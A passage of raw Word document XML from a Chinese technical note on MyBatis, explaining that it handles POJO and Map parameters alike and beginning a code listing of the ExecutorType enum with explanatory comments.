                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRPr="00E24A49" w:rsidRDefault="00944ED8" w:rsidP="00944ED8"/>
    <w:p w:rsidR="00944ED8" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="150" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0" w:line="378" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="404040"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>上面这个Junit测试方法，是我写的一个测试用例中的一小段，其中的UserBean对象，就是一个有三个属性userName，userPassword，createDate的POJO对象，对应的Mapper文件是文章开头给出的配置文件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="378" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="404040"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>第一次测试，我使用的是一个UserBean对象，来获取和计算sql语句，而第二次我是使用了一个HashMap对象，按照属性的名字，我分别设置了两个键值对象，我甚至还直接使用它来启动了一次session对象的查询selectOne。所有这些操作，都是测试通过（绿条）。这充分说明了，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="E53333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Mybatis参数获取过程中，对Map对象和普通POJO对象的无差别化，因为在内部，两者都会被封装，然后通过Map接口来访问！</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="150" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0" w:line="378" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="404040"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRPr="009A6898" w:rsidRDefault="00944ED8" w:rsidP="00944ED8"/>
    <w:p w:rsidR="00944ED8" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考资料</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00351012">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId235" w:history="1">
        <w:r w:rsidRPr="00235AD6">
          <w:rPr>
            <w:rStyle w:val="a6"/>
          </w:rPr>
          <w:t>http://www.open-open.com/lib/view/open1363572227609.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRDefault="00DA54D7" w:rsidP="00944ED8">
      <w:pPr>
        <w:ind w:firstLineChars="450" w:firstLine="945"/>
      </w:pPr>
      <w:hyperlink r:id="rId236" w:history="1">
        <w:r w:rsidR="00944ED8" w:rsidRPr="00113AAB">
          <w:rPr>
            <w:rStyle w:val="a6"/>
          </w:rPr>
          <w:t>http://chenjc-it.iteye.com/blog/1460990</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:pPr>
        <w:ind w:firstLineChars="450" w:firstLine="945"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:pPr>
        <w:ind w:firstLineChars="450" w:firstLine="945"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="ab"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="675" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="6379"/>
      </w:tblGrid>
      <w:tr w:rsidR="00944ED8" w:rsidTr="008232D6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6379" w:type="dxa"/>
          </w:tcPr>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488"/>
              <w:gridCol w:w="4675"/>
            </w:tblGrid>
            <w:tr w:rsidR="00944ED8" w:rsidRPr="00DD77CA" w:rsidTr="008232D6">
              <w:trPr>
                <w:gridAfter w:val="1"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                  <w:tcMar>
                    <w:top w:w="0" w:type="dxa"/>
                    <w:left w:w="150" w:type="dxa"/>
                    <w:bottom w:w="0" w:type="dxa"/>
                    <w:right w:w="150" w:type="dxa"/>
                  </w:tcMar>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w:rsidR="00944ED8" w:rsidRPr="00DD77CA" w:rsidRDefault="00944ED8" w:rsidP="008232D6">
                  <w:pPr>
                    <w:spacing w:line="273" w:lineRule="atLeast"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:color w:val="333333"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DD77CA">
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:color w:val="A71D5D"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>public</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00DD77CA">
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:color w:val="333333"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r w:rsidRPr="00DD77CA">
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:color w:val="A71D5D"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>enum</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r w:rsidRPr="00DD77CA">
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:color w:val="795DA3"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>ExecutorType</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00DD77CA">
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:color w:val="333333"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> {</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00944ED8" w:rsidRPr="00DD77CA" w:rsidTr="008232D6">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="750" w:type="dxa"/>
                  <w:tcBorders>
                    <w:top w:val="single" w:sz="2" w:space="0" w:color="EEEEEE"/>
                    <w:left w:val="single" w:sz="2" w:space="0" w:color="EEEEEE"/>
                    <w:bottom w:val="single" w:sz="2" w:space="0" w:color="EEEEEE"/>
                    <w:right w:val="single" w:sz="6" w:space="0" w:color="EEEEEE"/>
                  </w:tcBorders>
                  <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                  <w:noWrap/>
                  <w:tcMar>
                    <w:top w:w="0" w:type="dxa"/>
                    <w:left w:w="150" w:type="dxa"/>
                    <w:bottom w:w="0" w:type="dxa"/>
                    <w:right w:w="150" w:type="dxa"/>
                  </w:tcMar>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w:rsidR="00944ED8" w:rsidRPr="00DD77CA" w:rsidRDefault="00944ED8" w:rsidP="008232D6">
                  <w:pPr>
                    <w:spacing w:line="270" w:lineRule="atLeast"/>
                    <w:jc w:val="right"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:color w:val="333333"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                  <w:tcMar>
                    <w:top w:w="0" w:type="dxa"/>
                    <w:left w:w="150" w:type="dxa"/>
                    <w:bottom w:w="0" w:type="dxa"/>
                    <w:right w:w="150" w:type="dxa"/>
                  </w:tcMar>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w:rsidR="00944ED8" w:rsidRPr="00DD77CA" w:rsidRDefault="00944ED8" w:rsidP="008232D6">
                  <w:pPr>
                    <w:spacing w:line="273" w:lineRule="atLeast"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:color w:val="333333"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DD77CA">
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:color w:val="333333"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">    </w:t>
                  </w:r>
                  <w:r w:rsidRPr="00DD77CA">
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:color w:val="969896"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>//ExecutorType.SIMPLE</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00944ED8" w:rsidRPr="00DD77CA" w:rsidTr="008232D6">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="750" w:type="dxa"/>
                  <w:tcBorders>
                    <w:top w:val="single" w:sz="2" w:space="0" w:color="EEEEEE"/>
                    <w:left w:val="single" w:sz="2" w:space="0" w:color="EEEEEE"/>
                    <w:bottom w:val="single" w:sz="2" w:space="0" w:color="EEEEEE"/>
                    <w:right w:val="single" w:sz="6" w:space="0" w:color="EEEEEE"/>
                  </w:tcBorders>
                  <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                  <w:noWrap/>
                  <w:tcMar>
                    <w:top w:w="0" w:type="dxa"/>
                    <w:left w:w="150" w:type="dxa"/>
                    <w:bottom w:w="0" w:type="dxa"/>
                    <w:right w:w="150" w:type="dxa"/>
                  </w:tcMar>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w:rsidR="00944ED8" w:rsidRPr="00DD77CA" w:rsidRDefault="00944ED8" w:rsidP="008232D6">
                  <w:pPr>
                    <w:spacing w:line="270" w:lineRule="atLeast"/>
                    <w:jc w:val="right"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:color w:val="333333"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                  <w:tcMar>
                    <w:top w:w="0" w:type="dxa"/>
                    <w:left w:w="150" w:type="dxa"/>
                    <w:bottom w:w="0" w:type="dxa"/>
                    <w:right w:w="150" w:type="dxa"/>
                  </w:tcMar>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w:rsidR="00944ED8" w:rsidRPr="00DD77CA" w:rsidRDefault="00944ED8" w:rsidP="008232D6">
                  <w:pPr>
                    <w:spacing w:line="273" w:lineRule="atLeast"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:color w:val="333333"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DD77CA">
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:color w:val="333333"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">    </w:t>
                  </w:r>
                  <w:r w:rsidRPr="00DD77CA">
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:color w:val="969896"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>//</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00DD77CA">
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:color w:val="969896"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>这个执行器类型不做特殊的事情。它为每个语句的执行创建一个新的预处理语句。</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00944ED8" w:rsidRPr="00DD77CA" w:rsidTr="008232D6">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="750" w:type="dxa"/>
                  <w:tcBorders>
                    <w:top w:val="single" w:sz="2" w:space="0" w:color="EEEEEE"/>
                    <w:left w:val="single" w:sz="2" w:space="0" w:color="EEEEEE"/>
                    <w:bottom w:val="single" w:sz="2" w:space="0" w:color="EEEEEE"/>
                    <w:right w:val="single" w:sz="6" w:space="0" w:color="EEEEEE"/>
                  </w:tcBorders>
                  <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                  <w:noWrap/>
                  <w:tcMar>
                    <w:top w:w="0" w:type="dxa"/>
                    <w:left w:w="150" w:type="dxa"/>
                    <w:bottom w:w="0" w:type="dxa"/>
                    <w:right w:w="150" w:type="dxa"/>
                  </w:tcMar>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w:rsidR="00944ED8" w:rsidRPr="00DD77CA" w:rsidRDefault="00944ED8" w:rsidP="008232D6">
                  <w:pPr>
                    <w:spacing w:line="270" w:lineRule="atLeast"/>
                    <w:jc w:val="right"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:color w:val="333333"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                  <w:tcMar>
                    <w:top w:w="0" w:type="dxa"/>
                    <w:left w:w="150" w:type="dxa"/>
                    <w:bottom w:w="0" w:type="dxa"/>
                    <w:right w:w="150" w:type="dxa"/>
                  </w:tcMar>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w:rsidR="00944ED8" w:rsidRPr="00DD77CA" w:rsidRDefault="00944ED8" w:rsidP="008232D6">
                  <w:pPr>
                    <w:spacing w:line="273" w:lineRule="atLeast"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:color w:val="333333"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DD77CA">
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:color w:val="333333"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">    </w:t>
                  </w:r>
                  <w:r w:rsidRPr="00DD77CA">
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:color w:val="969896"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>//ExecutorType.REUSE</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00944ED8" w:rsidRPr="00DD77CA" w:rsidTr="008232D6">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="750" w:type="dxa"/>
                  <w:tcBorders>
                    <w:top w:val="single" w:sz="2" w:space="0" w:color="EEEEEE"/>
                    <w:left w:val="single" w:sz="2" w:space="0" w:color="EEEEEE"/>
                    <w:bottom w:val="single" w:sz="2" w:space="0" w:color="EEEEEE"/>
                    <w:right w:val="single" w:sz="6" w:space="0" w:color="EEEEEE"/>
                  </w:tcBorders>
                  <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                  <w:noWrap/>
                  <w:tcMar>
                    <w:top w:w="0" w:type="dxa"/>
                    <w:left w:w="150" w:type="dxa"/>
                    <w:bottom w:w="0" w:type="dxa"/>
                    <w:right w:w="150" w:type="dxa"/>
                  </w:tcMar>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w:rsidR="00944ED8" w:rsidRPr="00DD77CA" w:rsidRDefault="00944ED8" w:rsidP="008232D6">
                  <w:pPr>
                    <w:spacing w:line="270" w:lineRule="atLeast"/>
                    <w:jc w:val="right"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:color w:val="333333"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                  <w:tcMar>
                    <w:top w:w="0" w:type="dxa"/>
                    <w:left w:w="150" w:type="dxa"/>
                    <w:bottom w:w="0" w:type="dxa"/>
                    <w:right w:w="150" w:type="dxa"/>
                  </w:tcMar>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w:rsidR="00944ED8" w:rsidRPr="00DD77CA" w:rsidRDefault="00944ED8" w:rsidP="008232D6">
                  <w:pPr>
                    <w:spacing w:line="273" w:lineRule="atLeast"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:color w:val="333333"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DD77CA">
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:color w:val="333333"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">    </w:t>
                  </w:r>
                  <w:r w:rsidRPr="00DD77CA">
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:color w:val="969896"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>//</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00DD77CA">
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:color w:val="969896"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>这个执行器类型会复用预处理语句。</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00944ED8" w:rsidRPr="00DD77CA" w:rsidTr="008232D6">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="750" w:type="dxa"/>
                  <w:tcBorders>
                    <w:top w:val="single" w:sz="2" w:space="0" w:color="EEEEEE"/>
                    <w:left w:val="single" w:sz="2" w:space="0" w:color="EEEEEE"/>
                    <w:bottom w:val="single" w:sz="2" w:space="0" w:color="EEEEEE"/>
                    <w:right w:val="single" w:sz="6" w:space="0" w:color="EEEEEE"/>
                  </w:tcBorders>
                  <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                  <w:noWrap/>
                  <w:tcMar>
                    <w:top w:w="0" w:type="dxa"/>
                    <w:left w:w="150" w:type="dxa"/>
                    <w:bottom w:w="0" w:type="dxa"/>
                    <w:right w:w="150" w:type="dxa"/>
                  </w:tcMar>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w:rsidR="00944ED8" w:rsidRPr="00DD77CA" w:rsidRDefault="00944ED8" w:rsidP="008232D6">
                  <w:pPr>
                    <w:spacing w:line="270" w:lineRule="atLeast"/>
                    <w:jc w:val="right"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:color w:val="333333"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                  <w:tcMar>
                    <w:top w:w="0" w:type="dxa"/>
                    <w:left w:w="150" w:type="dxa"/>
                    <w:bottom w:w="0" w:type="dxa"/>
                    <w:right w:w="150" w:type="dxa"/>
                  </w:tcMar>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w:rsidR="00944ED8" w:rsidRPr="00DD77CA" w:rsidRDefault="00944ED8" w:rsidP="008232D6">
                  <w:pPr>
                    <w:spacing w:line="273" w:lineRule="atLeast"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:color w:val="333333"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DD77CA">
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:color w:val="333333"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">    </w:t>
                  </w:r>
                  <w:r w:rsidRPr="00DD77CA">
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:color w:val="969896"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>//ExecutorType.BATCH</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00944ED8" w:rsidRPr="00DD77CA" w:rsidTr="008232D6">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="750" w:type="dxa"/>
                  <w:tcBorders>
                    <w:top w:val="single" w:sz="2" w:space="0" w:color="EEEEEE"/>
                    <w:left w:val="single" w:sz="2" w:space="0" w:color="EEEEEE"/>
                    <w:bottom w:val="single" w:sz="2" w:space="0" w:color="EEEEEE"/>
                    <w:right w:val="single" w:sz="6" w:space="0" w:color="EEEEEE"/>
                  </w:tcBorders>
                  <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                  <w:noWrap/>
                  <w:tcMar>
                    <w:top w:w="0" w:type="dxa"/>
                    <w:left w:w="150" w:type="dxa"/>
                    <w:bottom w:w="0" w:type="dxa"/>
                    <w:right w:w="150" w:type="dxa"/>
                  </w:tcMar>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w:rsidR="00944ED8" w:rsidRPr="00DD77CA" w:rsidRDefault="00944ED8" w:rsidP="008232D6">
                  <w:pPr>
                    <w:spacing w:line="270" w:lineRule="atLeast"/>
                    <w:jc w:val="right"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:color w:val="333333"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                  <w:tcMar>
                    <w:top w:w="0" w:type="dxa"/>
                    <w:left w:w="150" w:type="dxa"/>
                    <w:bottom w:w="0" w:type="dxa"/>
                    <w:right w:w="150" w:type="dxa"/>
                  </w:tcMar>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w:rsidR="00944ED8" w:rsidRPr="00DD77CA" w:rsidRDefault="00944ED8" w:rsidP="008232D6">
                  <w:pPr>
                    <w:spacing w:line="273" w:lineRule="atLeast"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:color w:val="333333"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DD77CA">
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:color w:val="333333"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">    </w:t>
                  </w:r>
                  <w:r w:rsidRPr="00DD77CA">
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:color w:val="969896"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>//</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00DD77CA">
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:color w:val="969896"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>这个执行器会批量执行所有更新语句，如果</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00DD77CA">
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:color w:val="969896"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>SELECT</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00DD77CA">
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:color w:val="969896"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>在它们中间执行还会标定它们是必须的，来保证一个简单并易于理解的行为。</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
